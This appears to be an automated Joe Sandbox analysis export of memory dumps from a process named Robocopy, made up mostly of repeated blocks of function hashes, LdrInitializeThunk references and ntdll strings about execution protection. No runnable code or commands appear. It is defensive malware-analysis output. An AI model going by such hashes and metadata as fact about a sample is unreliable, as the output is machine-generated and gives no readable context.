                                                                                    • Opcode ID: 93ea5329d4a6336cf6036b33c33797e5accb382814481688e7d7f79072bc6ab1
                                                                                    • Instruction ID: aa880afa0502c82d6eb3f366c878db62734a80e422566a1177a6e8421fdc3f07
                                                                                    • Opcode Fuzzy Hash: 93ea5329d4a6336cf6036b33c33797e5accb382814481688e7d7f79072bc6ab1
                                                                                    • Instruction Fuzzy Hash: D6900225242041527945B958550450B40069BE02D5791C41AA1405950CC53AE856E621

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 148 4a32c30-4a32c3c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e985657285e446eb97974a1da6def915ea5ef13704b86cedaa23a408befdae96
                                                                                    • Instruction ID: 3c907312eb4b1acd25714366a2627a5bfbff6652928cfb7c6610f3b7f2488886
                                                                                    • Opcode Fuzzy Hash: e985657285e446eb97974a1da6def915ea5ef13704b86cedaa23a408befdae96
                                                                                    • Instruction Fuzzy Hash: 1290022D21300002F5807958650860E00058BD1296F91D81DA0006558CC929D8696321

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 149 4a32c50-4a32c5c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 71e5cc5d5f2050070d1b9cf11d8bdf526f31f093f041b9dc604a11f5bd19add7
                                                                                    • Instruction ID: 737ed7364c4e4ac81cdce905801c0c02092590997f59e4fcc8a8a96cc4c032ba
                                                                                    • Opcode Fuzzy Hash: 71e5cc5d5f2050070d1b9cf11d8bdf526f31f093f041b9dc604a11f5bd19add7
                                                                                    • Instruction Fuzzy Hash: 5590022530100003F5407958651860A4005DBE1395F51D419E0405554CD929D8566222
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: dac8fa11ca2bc0ee25d29804b6928d7166d6b5899a62362a7d4878bc978cb347
                                                                                    • Instruction ID: ddb0ce9e198fb43032659ab50d869d235484297f179a400b471ffd5128936815
                                                                                    • Opcode Fuzzy Hash: dac8fa11ca2bc0ee25d29804b6928d7166d6b5899a62362a7d4878bc978cb347
                                                                                    • Instruction Fuzzy Hash: 7590022560100502F5017958550461A000A8BD02D5F91C42AA1015555ECA39D992B131

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 151 4a32d10-4a32d1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f98be53651398e8a2808db3ec17f2bee25a6a3a6e4d6a95166aadda7b8044e3d
                                                                                    • Instruction ID: c2b905b85d54c8d4c6afd111f79857d61bf1b61169acf7dacaea48e333abe920
                                                                                    • Opcode Fuzzy Hash: f98be53651398e8a2808db3ec17f2bee25a6a3a6e4d6a95166aadda7b8044e3d
                                                                                    • Instruction Fuzzy Hash: 3790023520100413F5117958560470B00098BD02D5F91C81AA0415558DD66AD952B121
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 21db819f8e068b572d3c26145f64473dff43aaf2ca79933873c31a1bd5777a00
                                                                                    • Instruction ID: 40666bf0a5a83462e37b69d9c65e05bedb1a71a5dbfd0f1b0277deee48f30e58
                                                                                    • Opcode Fuzzy Hash: 21db819f8e068b572d3c26145f64473dff43aaf2ca79933873c31a1bd5777a00
                                                                                    • Instruction Fuzzy Hash: FA9002256010004265407968994490A4005AFE12A5751C529A0989550DC56DD8656665
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0ea4a2b68a0ab19ebdbd5b76d4f6a1eebc08677ad95d50cd6538cddd78c0f4f5
                                                                                    • Instruction ID: 1c610d2bcc95f5050fe73f0353a990424102566ddc5ac8186a6e630a53d426f4
                                                                                    • Opcode Fuzzy Hash: 0ea4a2b68a0ab19ebdbd5b76d4f6a1eebc08677ad95d50cd6538cddd78c0f4f5
                                                                                    • Instruction Fuzzy Hash: EC90026520140403F5407D58590460B00058BD0396F51C419A2055555ECA3DDC517135
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4c11eebbd0759a078495eb66ed591535c35a8de5a5728ff8168b8767c9b8073f
                                                                                    • Instruction ID: a3696bcadb6e449276f9a78db84c5bbfecbf2df9abc598ff272a663ba706abfe
                                                                                    • Opcode Fuzzy Hash: 4c11eebbd0759a078495eb66ed591535c35a8de5a5728ff8168b8767c9b8073f
                                                                                    • Instruction Fuzzy Hash: 6F90026534100442F50079585514B0A0005CBE1395F51C41DE1055554DC62DDC527126
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: fbbec5f5d831f229e193ed59dbbd51abb2d4955402eb22829fd9d6fac9d5781f
                                                                                    • Instruction ID: df88ede08ba0f3791383aaf7ebedf75d68d0f07b837f5e4a270928a091f1d907
                                                                                    • Opcode Fuzzy Hash: fbbec5f5d831f229e193ed59dbbd51abb2d4955402eb22829fd9d6fac9d5781f
                                                                                    • Instruction Fuzzy Hash: B290022521180042F6007D685D14B0B00058BD0397F51C51DA0145554CC929D8616521
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0b4bc6f565bc4d8329250657d48421496a22b439d2a734a959ece03eb6f8a558
                                                                                    • Instruction ID: e57bd79a915f9bff6d3372777e5b7a483f2b132fed37e8266dc42c01416fc456
                                                                                    • Opcode Fuzzy Hash: 0b4bc6f565bc4d8329250657d48421496a22b439d2a734a959ece03eb6f8a558
                                                                                    • Instruction Fuzzy Hash: B490022524505102F550795C550461A4005ABE0295F51C429A0805594DC569D8557221

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 139 4a329f0-4a329fc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0dd0a09d088832c9035bcfdf73b377526c49645affbac67574d5f249b4b18e9e
                                                                                    • Instruction ID: 87ac8b1d8d81880b238d063dcf92e4b0b05a6c7989165409c8ca734448fd36ed
                                                                                    • Opcode Fuzzy Hash: 0dd0a09d088832c9035bcfdf73b377526c49645affbac67574d5f249b4b18e9e
                                                                                    • Instruction Fuzzy Hash: D3900229211000032505BD58170450B00468BD53E5351C429F1006550CD635D8616121

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 141 4a32a80-4a32a8c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f5cfb7035435a6c757cfd9994cb6522a84226e5fda8b363031959ac32a8113ba
                                                                                    • Instruction ID: 9e6c2723cbb9eb68480a61b4ba8c781f79ed1c29839772c07f7f362af52ae802
                                                                                    • Opcode Fuzzy Hash: f5cfb7035435a6c757cfd9994cb6522a84226e5fda8b363031959ac32a8113ba
                                                                                    • Instruction Fuzzy Hash: B29002652020000365057958551461A400A8BE0295B51C429E1005590DC539D8917125

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 142 4a32ac0-4a32acc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 871903a521a01270f9904ac4076d2fb8535348f6d75392c562e4fcb6b7a2b759
                                                                                    • Instruction ID: 387e3f84c9be7519121158579432692587037277c837efebfd6443178fe8abb8
                                                                                    • Opcode Fuzzy Hash: 871903a521a01270f9904ac4076d2fb8535348f6d75392c562e4fcb6b7a2b759
                                                                                    • Instruction Fuzzy Hash: 1F90023560500802F5507958551474A00058BD0395F51C419A0015654DC769DA5576A1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 140 4a32a10-4a32a1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 846aff9e762dab3b7bde7441a726647eb2f9f444f7e7d34e72271b03ef40b093
                                                                                    • Instruction ID: 57ce2467271e3010c43efe40e95537e63271c17baf9c8765a4237138c2988548
                                                                                    • Opcode Fuzzy Hash: 846aff9e762dab3b7bde7441a726647eb2f9f444f7e7d34e72271b03ef40b093
                                                                                    • Instruction Fuzzy Hash: 61900229221000022545BD58170450F04459BD63E5391C41DF1407590CC635D8656321

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 145 4a32b80-4a32b8c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2bb2018bc4686542b4f2f1c28fec1912a932804000033a4f9c867c5661e5df08
                                                                                    • Instruction ID: a2a6c8323b3fed4b8d0b7f8e537e132f052e0c9e35bbc8a36243d66ce541298c
                                                                                    • Opcode Fuzzy Hash: 2bb2018bc4686542b4f2f1c28fec1912a932804000033a4f9c867c5661e5df08
                                                                                    • Instruction Fuzzy Hash: 7290023520100842F50079585504B4A00058BE0395F51C41EA0115654DC629D8517521

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 146 4a32b90-4a32b9c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 136e17ec6a2c91dc89fa37262abb91132aebf5f49b4a741173ec727f9413a56d
                                                                                    • Instruction ID: f0990f54b63d78833a121a3a1cc524b9ebb476411522f2525b7401415e995937
                                                                                    • Opcode Fuzzy Hash: 136e17ec6a2c91dc89fa37262abb91132aebf5f49b4a741173ec727f9413a56d
                                                                                    • Instruction Fuzzy Hash: B890023520108802F5107958950474E00058BD0395F55C819A4415658DC6A9D8917121

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 147 4a32bc0-4a32bcc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 1d13d916fab5343636590be338477e821ea279b605e89ea0edb2a8ff126c23a1
                                                                                    • Instruction ID: 05dd58700845c09aa9b78bf7e5f4eb10234a26ad6345abecaff51eca2ff267ba
                                                                                    • Opcode Fuzzy Hash: 1d13d916fab5343636590be338477e821ea279b605e89ea0edb2a8ff126c23a1
                                                                                    • Instruction Fuzzy Hash: 7D90023520100402F5007D98650864A00058BE0395F51D419A5015555EC679D8917131

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 143 4a32b00-4a32b0c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6c69e8a229a41b50405fe8a17724288899bd672244d39e5f1e4846ecb62bfbc8
                                                                                    • Instruction ID: ea4b7cac54e7bb2954899a28b671f62caef2c5fe0ce583af13cc673b19a34105
                                                                                    • Opcode Fuzzy Hash: 6c69e8a229a41b50405fe8a17724288899bd672244d39e5f1e4846ecb62bfbc8
                                                                                    • Instruction Fuzzy Hash: DC90023520504842F54079585504A4A00158BD0399F51C419A0055694DD639DD55B661

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 144 4a32b10-4a32b1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6c194de23aa6b85a6ad9f78245213556a74ce0e120f85fe3f38e6df52c9afe00
                                                                                    • Instruction ID: eab69196ef2ed5307f4b25d26ebce5c15425b049c0883a441def0bf755af8192
                                                                                    • Opcode Fuzzy Hash: 6c194de23aa6b85a6ad9f78245213556a74ce0e120f85fe3f38e6df52c9afe00
                                                                                    • Instruction Fuzzy Hash: 1990023520100802F5807958550464E00058BD1395F91C41DA0016654DCA29DA5977A1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 135 4a32b2a-4a32b2f 136 4a32b31-4a32b38 135->136 137 4a32b3f-4a32b46 LdrInitializeThunk 135->137
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b556d94714e50933fa0d5a8ed72fdb713e90387d8aa08cfd3237a1ae88cab234
                                                                                    • Instruction ID: ae022c642d1e22ed7b2142f0b1948beb86b6556c6cc98e27f5a1e2d04592b3db
                                                                                    • Opcode Fuzzy Hash: b556d94714e50933fa0d5a8ed72fdb713e90387d8aa08cfd3237a1ae88cab234
                                                                                    • Instruction Fuzzy Hash: 33B09B729014C5C5FB11FF60570871B7900ABD0755F15C495F2460641E473CD091F175
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10259682638.0000000002780000.00000040.80000000.00040000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2780000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e82fbc6a45cd3cf078711487c278617d821cc1cf8174f7734961781c4918724
                                                                                    • Instruction ID: d2e9ab8ff90462b81d72d532c6f9f30b7fecbfd6b82f6afe9c57e2a3639f74b0
                                                                                    • Opcode Fuzzy Hash: 3e82fbc6a45cd3cf078711487c278617d821cc1cf8174f7734961781c4918724
                                                                                    • Instruction Fuzzy Hash: 0701F9BB005AA18BDB40DEBCA89A2CD3FA2C3266B4388175BC4E08F2D3D5024117CB11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10259682638.0000000002780000.00000040.80000000.00040000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2780000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dbfe827f8bd11239ba6af76bf2c85a59a1b8f46688c8d9b84c4a93fbb18bb227
                                                                                    • Instruction ID: 2cfc03dcbe24e198aba57f864924aee99c5bce1a8a692dc30bea4dfc4c62ee3a
                                                                                    • Opcode Fuzzy Hash: dbfe827f8bd11239ba6af76bf2c85a59a1b8f46688c8d9b84c4a93fbb18bb227
                                                                                    • Instruction Fuzzy Hash: 8F019E6340EB924BD782C73864A4185FF76ED527313284BEEC0D04B1E3E7124113C751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10259682638.0000000002780000.00000040.80000000.00040000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2780000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5342419a12662f9dbfe9236f64693cd27499fa08d479e9d7053bc2788993037c
                                                                                    • Instruction ID: 2c1843b5a7664e74748b18bdf56b73e44cd97d1103177dadd5ccdb02e2f3f48e
                                                                                    • Opcode Fuzzy Hash: 5342419a12662f9dbfe9236f64693cd27499fa08d479e9d7053bc2788993037c
                                                                                    • Instruction Fuzzy Hash: 77D0A72500DA429EC7829B39D4D4548B772FE656753344FBEC1E8965F0EB2311458B62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10262446675.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_4d10000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 09da1592a22ef79f5104c63075f35c817a244e32282953f4a89517a83554799d
                                                                                    • Instruction ID: 09939597944ac1c8e16ac2f4cd19c8844db48aea7d6c4b460519ed5f15a04759
                                                                                    • Opcode Fuzzy Hash: 09da1592a22ef79f5104c63075f35c817a244e32282953f4a89517a83554799d
                                                                                    • Instruction Fuzzy Hash: 1621C830708B0A5FE354AF58B08077AB3E2FB89314F50453DCC8BC7761DA35E4828644
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04A64460
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04A64507
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04A64530
                                                                                    • ExecuteOptions, xrefs: 04A644AB
                                                                                    • Execute=1, xrefs: 04A6451E
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 04A64592
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04A6454D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: 4e1f313c39100f1ebbe7d8e711fbdb0059206a469991257ee3cdc8f222290d9e
                                                                                    • Instruction ID: 50227d241291214879cc8ae7dc22bbb224269957c04e4bce30fb72db0fcc8a71
                                                                                    • Opcode Fuzzy Hash: 4e1f313c39100f1ebbe7d8e711fbdb0059206a469991257ee3cdc8f222290d9e
